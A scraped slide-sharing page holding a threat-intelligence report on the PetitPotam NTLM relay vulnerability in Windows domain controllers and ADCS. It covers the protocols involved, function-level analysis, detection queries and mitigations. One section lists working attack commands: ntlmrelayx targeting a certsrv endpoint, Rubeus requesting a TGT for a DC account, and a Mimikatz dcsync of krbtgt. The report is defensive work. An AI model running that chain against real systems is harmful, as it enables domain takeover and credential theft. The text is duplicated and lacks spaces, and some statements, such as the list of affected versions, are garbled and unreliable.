PetitPotam Vulnerability Analysis Report
marketing302922
1 views
30 slides
Oct 06, 2025
Slide 1 of 30
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
About This Presentation
Today, constantly changing and developing cyber threats, ensuring the security of systems to regularly follow up the current vulnerabilities at the point of necessitates swift action. Therefore, analysis of detected vulnerabilities taking necessary security measures to prevent possible attacks is cr...
Slide Content
PetitPotam Vulnerability
Analysis
Author: Threat Intelligence Team
Release Date: 02.11.2021
Report ID: BD02112102
Analysis
Author: Threat Intelligence Team
Release Date: 02.11.2021
Report ID: BD02112102
PetitPotam Vulnerability
Analysis
Threat Intelligence Team
02.11.2021
BD02112102
Tableof Contents
Introduction
Detection Phase
Mitigation and Measures
Conclusion30
14
4
7Vulnerability Analysis
25
Exploitation18
Analysis
Threat Intelligence Team
02.11.2021
BD02112102
Tableof Contents
Introduction
Detection Phase
Mitigation and Measures
Conclusion30
14
4
7Vulnerability Analysis
25
Exploitation18
PetitPotam Vulnerability
Analysis
Threat Intelligence Team
02.11.2021
BD02112102
Tableof Contents
Overview
DarkSideAttack Lifecycle
MITRE ATT&CK
Conclusion19
16
9
3
7Targeted Countries and Sectors
Indicatorsof Compromise
AboutBrandefense24
Introduction
Analysis
Threat Intelligence Team
02.11.2021
BD02112102
Tableof Contents
Overview
DarkSideAttack Lifecycle
MITRE ATT&CK
Conclusion19
16
9
3
7Targeted Countries and Sectors
Indicatorsof Compromise
AboutBrandefense24
Introduction
4
Introduction
Today,constantlychanginganddevelopingcyberthreats,ensuringthesecurityof
systemstoregularlyfollowupthecurrentvulnerabilitiesatthepointofnecessitates
swiftaction.Therefore,analysisofdetectedvulnerabilitiestakingnecessarysecurity
measurestopreventpossibleattacksiscriticalinthisregard.
PetitPotamvulnerability,whichisthesubjectofthisreport,isavulnerabilityto
analyzingandnecessarymeasures.
PetitPotam Vulnerability Analysis
What is NTLM?
NTLM(NewTechnologyLanManager)isaprotocolpresentedbyMicrosoftto
authenticateusersandprotecttheintegrityandprivacyoftheiractivities.
TheNTLMthatperformstheauthenticationprocesswithathree-wayhandshakeis
workingbasedon“challenge-response”.Today,theNTLMinWindowssystemshas
lefttheKerberosProtocol,similartoanauthenticationprotocol.Butbysomeplans,
NTLMisstillsupported.
ThefollowingstepsareappliedtocreateanNTLMHashvalue.First,theuser
passwordistranslatedintoLittleEndianUTF-16format,andthentheMD4hash
valueisformed.Finally,thisvalueisstoredintheSAMfile.
Introduction
Today,constantlychanginganddevelopingcyberthreats,ensuringthesecurityof
systemstoregularlyfollowupthecurrentvulnerabilitiesatthepointofnecessitates
swiftaction.Therefore,analysisofdetectedvulnerabilitiestakingnecessarysecurity
measurestopreventpossibleattacksiscriticalinthisregard.
PetitPotamvulnerability,whichisthesubjectofthisreport,isavulnerabilityto
analyzingandnecessarymeasures.
PetitPotam Vulnerability Analysis
What is NTLM?
NTLM(NewTechnologyLanManager)isaprotocolpresentedbyMicrosoftto
authenticateusersandprotecttheintegrityandprivacyoftheiractivities.
TheNTLMthatperformstheauthenticationprocesswithathree-wayhandshakeis
workingbasedon“challenge-response”.Today,theNTLMinWindowssystemshas
lefttheKerberosProtocol,similartoanauthenticationprotocol.Butbysomeplans,
NTLMisstillsupported.
ThefollowingstepsareappliedtocreateanNTLMHashvalue.First,theuser
passwordistranslatedintoLittleEndianUTF-16format,andthentheMD4hash
valueisformed.Finally,thisvalueisstoredintheSAMfile.
5
PetitPotam Vulnerability Analysis
Introduction
TheNTLMperformingtheuserIDverificationprocesswiththechallenge-response
mechanismisoperatingwiththefollowingsteps:
1.Theuseraccessesaclientandsharestheusername,password,anddomain
informationwiththeclient.
2.Theclientcreatesanencryptedversionofthepasswordanddeletestheplain
password.
3.Theclientforwardstheusernametothecorrespondingserverasplaintext.
4.Theserverproducesa16-byterandomnumbernamedchallengeornonceand
sendsthisnumbertotheclient.
5.Theclientencryptsthereceivedchallengevaluewiththehashvalueoftheuser
passwordandsendsittotheserver.Thisiscalledresponse.
6.Theserversendstheusername,challenge,andresponsevaluestoDC(Domain
Controllerisaserverthatrespondstoauthenticationrequestsandverifiesusers
oncomputernetworks.).
7.TheDCreceivesthehashvalueoftheuserpasswordfromtheSAM(Security
AccessManager)databaseusingtheusername.Thishashvaluereceivedisused
toencryptthechallengevalue.
8.TheDCcomparestheencryptedchallengevalueinstep6withtheresponse
valueproducedbytheclientinstep5.Ifthematchisformed,theauthentication
isperformed.NTLM Relay Attack
InNTLMRelayAttack,alocationiscreatedbetweentheclient-serveronthenetwork,
primarilybycyberthreatactors.Thus,authenticationtrafficiscontrolled.First,client
authenticationrequestsareforwardedbycyber-threatactors.Next,thecyber-threat
actoroftheservercanperformanauthenticationprocessontheincomingrequest.
Thus,cyber-threatactorscanauthenticateusingthecredentialsoftheclient.At
thesestages,theclientisconnectedtotheserverthatitwantstoconnectto.Asa
result,theserverbelievesitisalegitimateclienttoauthenticate.
Theremotecodecanbecarriedoutontheassaultwithanattackonadefensive
systemagainstNTLMRelayattacks,andtheremotecodeonthedevicecanbe
carriedoutoncriticalsystems(suchasdomaincontrollerservers)canbelateral.
How NTLM Works?
PetitPotam Vulnerability Analysis
Introduction
TheNTLMperformingtheuserIDverificationprocesswiththechallenge-response
mechanismisoperatingwiththefollowingsteps:
1.Theuseraccessesaclientandsharestheusername,password,anddomain
informationwiththeclient.
2.Theclientcreatesanencryptedversionofthepasswordanddeletestheplain
password.
3.Theclientforwardstheusernametothecorrespondingserverasplaintext.
4.Theserverproducesa16-byterandomnumbernamedchallengeornonceand
sendsthisnumbertotheclient.
5.Theclientencryptsthereceivedchallengevaluewiththehashvalueoftheuser
passwordandsendsittotheserver.Thisiscalledresponse.
6.Theserversendstheusername,challenge,andresponsevaluestoDC(Domain
Controllerisaserverthatrespondstoauthenticationrequestsandverifiesusers
oncomputernetworks.).
7.TheDCreceivesthehashvalueoftheuserpasswordfromtheSAM(Security
AccessManager)databaseusingtheusername.Thishashvaluereceivedisused
toencryptthechallengevalue.
8.TheDCcomparestheencryptedchallengevalueinstep6withtheresponse
valueproducedbytheclientinstep5.Ifthematchisformed,theauthentication
isperformed.NTLM Relay Attack
InNTLMRelayAttack,alocationiscreatedbetweentheclient-serveronthenetwork,
primarilybycyberthreatactors.Thus,authenticationtrafficiscontrolled.First,client
authenticationrequestsareforwardedbycyber-threatactors.Next,thecyber-threat
actoroftheservercanperformanauthenticationprocessontheincomingrequest.
Thus,cyber-threatactorscanauthenticateusingthecredentialsoftheclient.At
thesestages,theclientisconnectedtotheserverthatitwantstoconnectto.Asa
result,theserverbelievesitisalegitimateclienttoauthenticate.
Theremotecodecanbecarriedoutontheassaultwithanattackonadefensive
systemagainstNTLMRelayattacks,andtheremotecodeonthedevicecanbe
carriedoutoncriticalsystems(suchasdomaincontrollerservers)canbelateral.
How NTLM Works?
6
PetitPotam Vulnerability Analysis
Introduction
EFSRPC(EncryptingFileSystemRemoteProtocol)istheprotocolusedfarawayand
performsmaintenanceandmanagementprocessesofencrypteddataaccessed
overanetwork.Windowsuseittoprovideremotemanagementofencryptedfiles
withEFS(EncryptingFileSystem)
EFSRPCdoesnotaddresshowdataisencrypted,storeencrypteddata,orread,write,
create,anddeletethem.InWindows,NTFS,storagemechanism,SMB(Server
MessageBlock)protocolprovidesremoteaccesstosuchfiles.
SMB Protocol
TheSMB(ServerMessageBlock)protocolisaclient-servercommunicationprotocol
usedforfilesharingonanetwork.Theapplicationsallowyoutoreadandwritethe
filetorequestvariousservicesfromserverprogramsonthecomputernetwork.For
example,usingtheSMBprotocol,anapplicationcanbeaccessedtofilesona
network,printers,serialports(port),andotherresources.Thus,thefilesonthe
remoteservercanbereadandupdated,andnewfilesarecreated.Youcanalso
contactanyserverprogramthatissettoreceiveanSMBclientrequest.
Encrypting File System Remote Protocol (EFSRPC)
PetitPotam Vulnerability Analysis
Introduction
EFSRPC(EncryptingFileSystemRemoteProtocol)istheprotocolusedfarawayand
performsmaintenanceandmanagementprocessesofencrypteddataaccessed
overanetwork.Windowsuseittoprovideremotemanagementofencryptedfiles
withEFS(EncryptingFileSystem)
EFSRPCdoesnotaddresshowdataisencrypted,storeencrypteddata,orread,write,
create,anddeletethem.InWindows,NTFS,storagemechanism,SMB(Server
MessageBlock)protocolprovidesremoteaccesstosuchfiles.
SMB Protocol
TheSMB(ServerMessageBlock)protocolisaclient-servercommunicationprotocol
usedforfilesharingonanetwork.Theapplicationsallowyoutoreadandwritethe
filetorequestvariousservicesfromserverprogramsonthecomputernetwork.For
example,usingtheSMBprotocol,anapplicationcanbeaccessedtofilesona
network,printers,serialports(port),andotherresources.Thus,thefilesonthe
remoteservercanbereadandupdated,andnewfilesarecreated.Youcanalso
contactanyserverprogramthatissettoreceiveanSMBclientrequest.
Encrypting File System Remote Protocol (EFSRPC)
7
PetitPotam Vulnerability Analysis
Introduction
ActiveDirectoryCertificateServices(ADCS)isaplatformdevelopedbyMicrosoft,
providingcustomizableservicestopublishandmanagedigitalcertificatesusedin
softwaresecuritysystemsthatusethesharedkey(PublicKey)technologies.The
digitalcertificatesgeneratedbyADCScanbeusedtoencryptelectronicdocuments
messagesanddigitallysign.Thesedigitalcertificationscanalsobeusedfor
authenticationofcomputer,user,ordeviceaccountsonanetwork.Acorporation
thatdoesnotuseADCSshoulduseThirdPartyplatformstoperformtheoperations
providedbyADCS.
ADCS,Secure/MultipurposeInternetMailExtensions(S/MIME),SecureWireless
Networks(SecureWirelessNetworks),VirtualPrivateNetworks(VPN),Internet
ProtocolSafety(IPSec),EncryptingFileSystem(EFS),SmartCardLogon,SSL/TLSand
aresupportedbymanymoreapplicationsandtheserver.
ADCSconsistsofsixdifferentcomponents:
CertificationAuthority(CA):Usersareusedtocertifyingcomputersandservicesand
managingthecertificatevalidity.Twooptionsareavailableasrootorsubordinate.
WebEnrollment:ItallowsuserstoconnecttoCAthroughthewebinterface.Thus,
userscanrequestacertificateandreceivethecertificatecancellationlists(CRL).
OnlineResponder:Itrespondstorequestsregardingthestatusofrequested
certificates.Afterdecodingthecertificate'sstatusandevaluatingitsposition,itsends
asignedresponsewithstatusinformation.
NetworkDeviceEnrollmentService:Allowsthenon-domainaccounttoobtaina
certificateofnetworkdevices.
CertificateEnrollmentPolicyWebService:Usersandcomputersareusedto
receivethecertificateregistrationpolicyinformation.
CertificateEnrollmentWebService:Itallowsusersandcomputerstoperform
certificateregistrationusingtheHTTPSprotocol.
Active Directory Certificate Services
PetitPotam Vulnerability Analysis
Introduction
ActiveDirectoryCertificateServices(ADCS)isaplatformdevelopedbyMicrosoft,
providingcustomizableservicestopublishandmanagedigitalcertificatesusedin
softwaresecuritysystemsthatusethesharedkey(PublicKey)technologies.The
digitalcertificatesgeneratedbyADCScanbeusedtoencryptelectronicdocuments
messagesanddigitallysign.Thesedigitalcertificationscanalsobeusedfor
authenticationofcomputer,user,ordeviceaccountsonanetwork.Acorporation
thatdoesnotuseADCSshoulduseThirdPartyplatformstoperformtheoperations
providedbyADCS.
ADCS,Secure/MultipurposeInternetMailExtensions(S/MIME),SecureWireless
Networks(SecureWirelessNetworks),VirtualPrivateNetworks(VPN),Internet
ProtocolSafety(IPSec),EncryptingFileSystem(EFS),SmartCardLogon,SSL/TLSand
aresupportedbymanymoreapplicationsandtheserver.
ADCSconsistsofsixdifferentcomponents:
CertificationAuthority(CA):Usersareusedtocertifyingcomputersandservicesand
managingthecertificatevalidity.Twooptionsareavailableasrootorsubordinate.
WebEnrollment:ItallowsuserstoconnecttoCAthroughthewebinterface.Thus,
userscanrequestacertificateandreceivethecertificatecancellationlists(CRL).
OnlineResponder:Itrespondstorequestsregardingthestatusofrequested
certificates.Afterdecodingthecertificate'sstatusandevaluatingitsposition,itsends
asignedresponsewithstatusinformation.
NetworkDeviceEnrollmentService:Allowsthenon-domainaccounttoobtaina
certificateofnetworkdevices.
CertificateEnrollmentPolicyWebService:Usersandcomputersareusedto
receivethecertificateregistrationpolicyinformation.
CertificateEnrollmentWebService:Itallowsusersandcomputerstoperform
certificateregistrationusingtheHTTPSprotocol.
Active Directory Certificate Services
8
Vulnerability
Analysis
Vulnerability
Analysis
9
PetitPotam Vulnerability Analysis
PetitPotam Vulnerability
PetitPotamisavulnerabilitythataffectsWindowsdomaincontrollers(Domain
Controller)orserversandisknownasNTLMRelayAttack.Safety,Cyber-threatactors
seizeNTLMauthenticationhashknowledge,allowingtheauthenticationprocesses
inthetargetdevice.
PetitPotamelementisduetotheabuseofMS-EFSRPC(EncryptingFileSystem
RemoteProtocol)protocolthatallowsWindowsdevicestoperformonthe
encrypteddatastoredonremotesystems.TheEfsRpcOpenFileRawfunctionused
bytheMS-EFSRPCprotocoliscausingweakness.PetitPotamcanbetriggeredby
connectingacyber-threatactortotheMS-EFSRPCinterfaceoftheremotesystem
bysendingtheSMBrequest.Thus,thetargetcomputermuststartan
authenticationprocessandshareauthenticationdetailsthroughNTLM.
PetitPotamvulnerability,whichcausesaman-in-the-middleattack,allowsadomain
controllertoperformNTLMauthenticationusingtheMS-EFSRPCprotocol.This
processiscarriedoutviaLSARPC((LocalSecurityAuthorityRemoteProtocol).By
forcingthetargetcomputertoperformanauthenticationprocessandsharehash
passwordsviaNTLM,WindowsADCScanbeexploited,andcertificateinformation
canbecaptured.ATGTticketcanberequestedonitsbehalfbyimitatingthetarget
devicewiththereceivedcertificateinformation.Inthisway,alldomaincontrollers
canbetakenoverwithoutanyauthentication.
Vulnerability Analysis
PetitPotam Vulnerability Analysis
PetitPotam Vulnerability
PetitPotamisavulnerabilitythataffectsWindowsdomaincontrollers(Domain
Controller)orserversandisknownasNTLMRelayAttack.Safety,Cyber-threatactors
seizeNTLMauthenticationhashknowledge,allowingtheauthenticationprocesses
inthetargetdevice.
PetitPotamelementisduetotheabuseofMS-EFSRPC(EncryptingFileSystem
RemoteProtocol)protocolthatallowsWindowsdevicestoperformonthe
encrypteddatastoredonremotesystems.TheEfsRpcOpenFileRawfunctionused
bytheMS-EFSRPCprotocoliscausingweakness.PetitPotamcanbetriggeredby
connectingacyber-threatactortotheMS-EFSRPCinterfaceoftheremotesystem
bysendingtheSMBrequest.Thus,thetargetcomputermuststartan
authenticationprocessandshareauthenticationdetailsthroughNTLM.
PetitPotamvulnerability,whichcausesaman-in-the-middleattack,allowsadomain
controllertoperformNTLMauthenticationusingtheMS-EFSRPCprotocol.This
processiscarriedoutviaLSARPC((LocalSecurityAuthorityRemoteProtocol).By
forcingthetargetcomputertoperformanauthenticationprocessandsharehash
passwordsviaNTLM,WindowsADCScanbeexploited,andcertificateinformation
canbecaptured.ATGTticketcanberequestedonitsbehalfbyimitatingthetarget
devicewiththereceivedcertificateinformation.Inthisway,alldomaincontrollers
canbetakenoverwithoutanyauthentication.
Vulnerability Analysis
10
PetitPotam Vulnerability Analysis
Vulnerability Analysis
WhentherequestedrequestEfsRpcOpenFileRawfunctioncalledPetitPotamis
reviewedbytheserver,theEfsRpcOpenFileRaw_Downlevelfunctioninefslsaext.dll
isconsideredtobeprocessed.Mostofthecodeofthisfunctionareincludedinan
impersonationblockbetweentheRpcImpersonateClientcallandthe
RpcRevertToSelfcall.Thecodeinthisblockisexecutedbythecodeotherthanthe
blockwhileexecutingtherequesttothepersonwhosenttherequest(cyberthreat
actor).
PetitPotamisavulnerabilitythataffectsWindowsdomaincontrollers(Domain
Controller)orserversandisknownasNTLMRelayAttack.Safety,Cyber-threatactors
seizeNTLMauthenticationhashknowledge,allowingtheauthenticationprocesses
inthetargetdevice.
PetitpotamelementisduetotheabuseofMS-EFSRPC(EncryptingFileSystem
RemoteProtocol)protocolthatallowsWindowsdevicestoperformonthe
encrypteddatastoredonremotesystems.TheEfsRpcOpenFileRawfunctionused
bytheMS-EFSRPCprotocoliscausingweakness.PetitPotamcanbetriggeredby
connectingacyber-threatactortotheMS-EFSRPCinterfaceoftheremotesystem
bysendingtheSMBrequest.Thus,thetargetcomputermuststartan
authenticationprocessandshareauthenticationdetailsthroughNTLM.
TheEfsRpcOpenFileRaw_Downlevelfunctionislocatedoutsidetheimpersonation
block,andtheEfsGetLocalFileNamefunctionistryingtoopentheUNCpath
providedbythecyber-threatactorisacall.ThisprocesscausesNTLMcredentialsto
besentinSMBrequests.TherelevantpartsoftheEfsRpcOpenFileRaw_Downlevel
functionareasfollows:
Technical Analysis
PetitPotam Vulnerability Analysis
Vulnerability Analysis
WhentherequestedrequestEfsRpcOpenFileRawfunctioncalledPetitPotamis
reviewedbytheserver,theEfsRpcOpenFileRaw_Downlevelfunctioninefslsaext.dll
isconsideredtobeprocessed.Mostofthecodeofthisfunctionareincludedinan
impersonationblockbetweentheRpcImpersonateClientcallandthe
RpcRevertToSelfcall.Thecodeinthisblockisexecutedbythecodeotherthanthe
blockwhileexecutingtherequesttothepersonwhosenttherequest(cyberthreat
actor).
PetitPotamisavulnerabilitythataffectsWindowsdomaincontrollers(Domain
Controller)orserversandisknownasNTLMRelayAttack.Safety,Cyber-threatactors
seizeNTLMauthenticationhashknowledge,allowingtheauthenticationprocesses
inthetargetdevice.
PetitpotamelementisduetotheabuseofMS-EFSRPC(EncryptingFileSystem
RemoteProtocol)protocolthatallowsWindowsdevicestoperformonthe
encrypteddatastoredonremotesystems.TheEfsRpcOpenFileRawfunctionused
bytheMS-EFSRPCprotocoliscausingweakness.PetitPotamcanbetriggeredby
connectingacyber-threatactortotheMS-EFSRPCinterfaceoftheremotesystem
bysendingtheSMBrequest.Thus,thetargetcomputermuststartan
authenticationprocessandshareauthenticationdetailsthroughNTLM.
TheEfsRpcOpenFileRaw_Downlevelfunctionislocatedoutsidetheimpersonation
block,andtheEfsGetLocalFileNamefunctionistryingtoopentheUNCpath
providedbythecyber-threatactorisacall.ThisprocesscausesNTLMcredentialsto
besentinSMBrequests.TherelevantpartsoftheEfsRpcOpenFileRaw_Downlevel
functionareasfollows:
Technical Analysis
11
PetitPotam Vulnerability Analysis
Vulnerability Analysis
Figure 1 EfsGetLocalFilenamefunction is the beginning of the
EfsRpcOpenFileRaw_Downlevelfunction by calling out of the
impersonation block
ThecallshownbytheredarrowabovecausesNTLMcredentialstobeleaked.This
calliscarriedoutwiththeauthorizationofthecomputeraccountinsteadoftheuser
authorizationthatsendstherequest.Theimpersonationblockstartsinpartshown
withanorangearrow.
PetitPotam Vulnerability Analysis
Vulnerability Analysis
Figure 1 EfsGetLocalFilenamefunction is the beginning of the
EfsRpcOpenFileRaw_Downlevelfunction by calling out of the
impersonation block
ThecallshownbytheredarrowabovecausesNTLMcredentialstobeleaked.This
calliscarriedoutwiththeauthorizationofthecomputeraccountinsteadoftheuser
authorizationthatsendstherequest.Theimpersonationblockstartsinpartshown
withanorangearrow.
12
PetitPotam Vulnerability Analysis
Vulnerability Analysis
Figure 2 Continue of the EfsRpcOpenFileRaw_Downlevel
function
WhenthecallssenttotheEFSRPCprotocolareexecutedwiththeidentityofthe
requestinguser,onlythecalltotheEfsGetLocalFileNamefunctionisnotcarriedout
withtheidentityoftherequesteduser.Thismeansthattheanonymousorprivileged
usercannotremotelyoperatetheEFSRPCfunctions,suchasreadingorcreating
randomnetworkfiles.
PetitPotam Vulnerability Analysis
Vulnerability Analysis
Figure 2 Continue of the EfsRpcOpenFileRaw_Downlevel
function
WhenthecallssenttotheEFSRPCprotocolareexecutedwiththeidentityofthe
requestinguser,onlythecalltotheEfsGetLocalFileNamefunctionisnotcarriedout
withtheidentityoftherequesteduser.Thismeansthattheanonymousorprivileged
usercannotremotelyoperatetheEFSRPCfunctions,suchasreadingorcreating
randomnetworkfiles.
13
PetitPotam Vulnerability Analysis
Vulnerability Analysis
Continue of the EFSRPCOPENFERAW_DOWNLEVEL function
WhenthecallssenttotheEFSRPCprotocolareexecutedwiththeidentityofthe
requestinguser,onlythecalltotheEFSGETLOCFENAMEfunctionisnotcarriedout
withtheidentityoftherequesteduser.Thismeansthattheanonymousorprivileged
usercannotremotelyoperatetheEFSRPCfunctions,suchasreadingorcreating
randomnetworkfiles.
Detection Phase
PetitPotam Vulnerability Analysis
Vulnerability Analysis
Continue of the EFSRPCOPENFERAW_DOWNLEVEL function
WhenthecallssenttotheEFSRPCprotocolareexecutedwiththeidentityofthe
requestinguser,onlythecalltotheEFSGETLOCFENAMEfunctionisnotcarriedout
withtheidentityoftherequesteduser.Thismeansthattheanonymousorprivileged
usercannotremotelyoperatetheEFSRPCfunctions,suchasreadingorcreating
randomnetworkfiles.
Detection Phase
14
PetitPotam Vulnerability Analysis
Systems Affected by PetitPotam Vulnerability
WindowsServer2008,WindowsServer2008R2,WindowsServer2008R2,Windows
Server2008,WindowsServer2008,andWindowsServer2022versionsarefoundto
beeffective.
PetitPotambenefitsfromtheserverswhereitisnotconfiguredwiththeprotections
for"ADCS"NTLMtransitionattacks.
TheuseofActiveDirectoryCertificateServices(ADCS)withanyofthefollowing
servicesshowsthatitispotentiallyvulnerabletoPetitPotamvulnerability:
•CertificateAuthorityWebEnrollment
•CertificateEnrollmentWebService
Detection PetitPotam Vulnerability
Method-1
IfaDCcertificatecanbeobtained,theTGTticketcanbetaken.Thus,itispossibleto
receivetheNThashinformationofaserviceaccountthatcontainstheDCcomputer
account.ThismakesitpossibletoseizetheentireDomain.Therequestis
transmittedwiththesender'sIPaddresswhentheTGTrequestissent.WhentheDC
accountisusedfromanon-DCmachine,theusernameistheusernameoftheDC
account,whiletheIPaddressdoesnotbelongtotheDCaccount.
Thefollowingstepscanbeappliedtodetectpetitpotamvulnerability:
•GetaListofDomainController
•GettheIPaddresslistfordomaincontrollers
•IfaDCaccounthasaTGTrequestwithanIPaddressthatisnotwithintheDCIP
list
Fortheabovemethod,thereisaquerytemplateforAzureSentinel.GitHublinkfora
templatehere(https://github.com/Cyb3r-Monk/Threat-Hunting-and-
Detection/tree/main/Credential%20Access)
Detection Phase
PetitPotam Vulnerability Analysis
Systems Affected by PetitPotam Vulnerability
WindowsServer2008,WindowsServer2008R2,WindowsServer2008R2,Windows
Server2008,WindowsServer2008,andWindowsServer2022versionsarefoundto
beeffective.
PetitPotambenefitsfromtheserverswhereitisnotconfiguredwiththeprotections
for"ADCS"NTLMtransitionattacks.
TheuseofActiveDirectoryCertificateServices(ADCS)withanyofthefollowing
servicesshowsthatitispotentiallyvulnerabletoPetitPotamvulnerability:
•CertificateAuthorityWebEnrollment
•CertificateEnrollmentWebService
Detection PetitPotam Vulnerability
Method-1
IfaDCcertificatecanbeobtained,theTGTticketcanbetaken.Thus,itispossibleto
receivetheNThashinformationofaserviceaccountthatcontainstheDCcomputer
account.ThismakesitpossibletoseizetheentireDomain.Therequestis
transmittedwiththesender'sIPaddresswhentheTGTrequestissent.WhentheDC
accountisusedfromanon-DCmachine,theusernameistheusernameoftheDC
account,whiletheIPaddressdoesnotbelongtotheDCaccount.
Thefollowingstepscanbeappliedtodetectpetitpotamvulnerability:
•GetaListofDomainController
•GettheIPaddresslistfordomaincontrollers
•IfaDCaccounthasaTGTrequestwithanIPaddressthatisnotwithintheDCIP
list
Fortheabovemethod,thereisaquerytemplateforAzureSentinel.GitHublinkfora
templatehere(https://github.com/Cyb3r-Monk/Threat-Hunting-and-
Detection/tree/main/Credential%20Access)
Detection Phase
15
PetitPotam Vulnerability Analysis
Detection Phase
Method-2
Somemethodsweredeterminedtodetecttheactionsassociatedwithvulnerability
inresearchonPetitPotam.IthasbeenfoundthateventsendingwithANONYMOUS
LOGONandconnectionswith5145,5140,4624EventIDarerelatedtoPetitPotam.
Thefollowingitemshelpdeterminethepossibleproblemsintheenvironmentfor
petitpotamaffairs:
AnyanonymousconnectionincludingconnectinganonymoustoRPC
Upgradeduseraccesswithoutweldingworkstation.Inmostcases,thissituationcan
bedevelopedbyignoringallnon-specificSRC/ClientIPaddresses.
windows_event_id=4624ANDuser=’ANONYMOUSLOGON’AND
authentication_package='NTLM'
Figure 3 Detection Query
PetitPotam Vulnerability Analysis
Detection Phase
Method-2
Somemethodsweredeterminedtodetecttheactionsassociatedwithvulnerability
inresearchonPetitPotam.IthasbeenfoundthateventsendingwithANONYMOUS
LOGONandconnectionswith5145,5140,4624EventIDarerelatedtoPetitPotam.
Thefollowingitemshelpdeterminethepossibleproblemsintheenvironmentfor
petitpotamaffairs:
AnyanonymousconnectionincludingconnectinganonymoustoRPC
Upgradeduseraccesswithoutweldingworkstation.Inmostcases,thissituationcan
bedevelopedbyignoringallnon-specificSRC/ClientIPaddresses.
windows_event_id=4624ANDuser=’ANONYMOUSLOGON’AND
authentication_package='NTLM'
Figure 3 Detection Query
16
PetitPotam Vulnerability Analysis
Detection Phase
windows_event_id=4624ANDelevated=trueANDpackage_name="NTLMV2"AND
workstation_nameisnull
windows_event_id=5145ANDobject_nameLIKE'%IPC%'ANDfile_pathin
('lsarpc','efsrpc','lsass','samr','netlogon')ANDaccess_grantedLIKE
'ReadData%WriteData%AddFile),'
InvestigationofPetitpotamTracesinEventShareFileLogs
PetitPotam Vulnerability Analysis
Detection Phase
windows_event_id=4624ANDelevated=trueANDpackage_name="NTLMV2"AND
workstation_nameisnull
windows_event_id=5145ANDobject_nameLIKE'%IPC%'ANDfile_pathin
('lsarpc','efsrpc','lsass','samr','netlogon')ANDaccess_grantedLIKE
'ReadData%WriteData%AddFile),'
InvestigationofPetitpotamTracesinEventShareFileLogs
17
Exploitation
Exploitation
18
PetitPotam Vulnerability Analysis
Exploitation
APOCtoolwaspublishedviaGitHubforPetitPotamvulnerability.Thistoolreveals
howacyber-threatactorexplimatestheMS-EFSRPCprotocolandreceivingNTLM
credentialsviaLSARPCtoauthenticateaserveronanotherserver.
POCToolGitHubLink:"https://github.com/topotam/petitpotam"
LabEnvironment
NtlmRelayxinstallation
NtlmRelayxisrequiredtodetectandcommunicatetheADCSserver.
Githublinki:“https://github.com/SecureAuthCorp/impacket”
gitclonehttps://github.com/ExAndroidDev/impacket.git
cdimpacket
gitcheckoutntlmrelayx-adcs-attack
sudopython3setup.pyinstall
Figure 4 Lab requirements
PetitPotam Vulnerability Analysis
Exploitation
APOCtoolwaspublishedviaGitHubforPetitPotamvulnerability.Thistoolreveals
howacyber-threatactorexplimatestheMS-EFSRPCprotocolandreceivingNTLM
credentialsviaLSARPCtoauthenticateaserveronanotherserver.
POCToolGitHubLink:"https://github.com/topotam/petitpotam"
LabEnvironment
NtlmRelayxinstallation
NtlmRelayxisrequiredtodetectandcommunicatetheADCSserver.
Githublinki:“https://github.com/SecureAuthCorp/impacket”
gitclonehttps://github.com/ExAndroidDev/impacket.git
cdimpacket
gitcheckoutntlmrelayx-adcs-attack
sudopython3setup.pyinstall
Figure 4 Lab requirements
19
PetitPotam Vulnerability Analysis
Exploitation
CertificateAuthorityFinding
"certutil.exe"isavailabletofindtheADCSserveronWindows
"Certutil.exe"isavailabletofindtheADCSserveronWindows.
Figure 5 Windows Active Directory Certificate Service
PetitPotam Vulnerability Analysis
Exploitation
CertificateAuthorityFinding
"certutil.exe"isavailabletofindtheADCSserveronWindows
"Certutil.exe"isavailabletofindtheADCSserveronWindows.
Figure 5 Windows Active Directory Certificate Service
20
PetitPotam Vulnerability Analysis
Exploitation
NTLMRelayxPreparation
TheauthenticationrequestsfromNTLMrelayxontheKalishouldbecaptured.Here
AsTemplatecanbeusedinKerberosauthentication,domainControlscanalsobe
used.
Sudo python3 ntlmrelayx.py -debug -smb2support --target
http://pki.lab.local/certsrv/certfnsh.asp
--adcs --template KerberosAuthentication
Figure 6 ntlmrelayxTool Usage
PetitPotam Vulnerability Analysis
Exploitation
NTLMRelayxPreparation
TheauthenticationrequestsfromNTLMrelayxontheKalishouldbecaptured.Here
AsTemplatecanbeusedinKerberosauthentication,domainControlscanalsobe
used.
Sudo python3 ntlmrelayx.py -debug -smb2support --target
http://pki.lab.local/certsrv/certfnsh.asp
--adcs --template KerberosAuthentication
Figure 6 ntlmrelayxTool Usage
21
PetitPotam Vulnerability Analysis
Exploitation
Forcingauthentication
PetitPotamonWindowsshouldbeforcedtoauthenticateNTLMauthenticationon
theKali.
PetitPotam Vulnerability Analysis
Exploitation
Forcingauthentication
PetitPotamonWindowsshouldbeforcedtoauthenticateNTLMauthenticationon
theKali.
22
PetitPotam Vulnerability Analysis
Exploitation
TGTrequesting
RubeustoolcanbeusedtorequestKerberosTGTinWindows.
Githublink:“https://github.com/GhostPac/Rubeus”
.\Rubeus.exeasktgt/outfile:kirbi/user:dc01$/ptt/certificate:<base64-certificate>
Figure 7 Rubeus Tool Usage
PetitPotam Vulnerability Analysis
Exploitation
TGTrequesting
RubeustoolcanbeusedtorequestKerberosTGTinWindows.
Githublink:“https://github.com/GhostPac/Rubeus”
.\Rubeus.exeasktgt/outfile:kirbi/user:dc01$/ptt/certificate:<base64-certificate>
Figure 7 Rubeus Tool Usage
23
PetitPotam Vulnerability Analysis
Exploitation
klistcommandcanbeusedtoconfirmtheTGTticket:
Finally,NTLMHashvaluescanbedisplayedviaMimikatz
lsadump::dcsync/user:krbgt
PetitPotam Vulnerability Analysis
Exploitation
klistcommandcanbeusedtoconfirmtheTGTticket:
Finally,NTLMHashvaluescanbedisplayedviaMimikatz
lsadump::dcsync/user:krbgt
24
PetitPotam Vulnerability Analysis
Exploitation
Mitigation and
Measures
PetitPotam Vulnerability Analysis
Exploitation
Mitigation and
Measures
25
PetitPotam Vulnerability Analysis
Mitigation and Measures
ItisrecommendedtodisableNTLMauthenticationprimarilytobeprotectedfrom
attacksagainstPetitPotam.Forthis,youshouldfirstbestartedgpedit.msc.Inthe
pop-upwindow,the“ComputerConfiguration>WindowsSettings>Security
Settings>LocalPolicies>SecurityOptions”tabmustbesetto"NetworkSecurity:
RestrictNTLM:NTLMAuthenticationinthisdomain"option.
PriorityMeasuresMethods
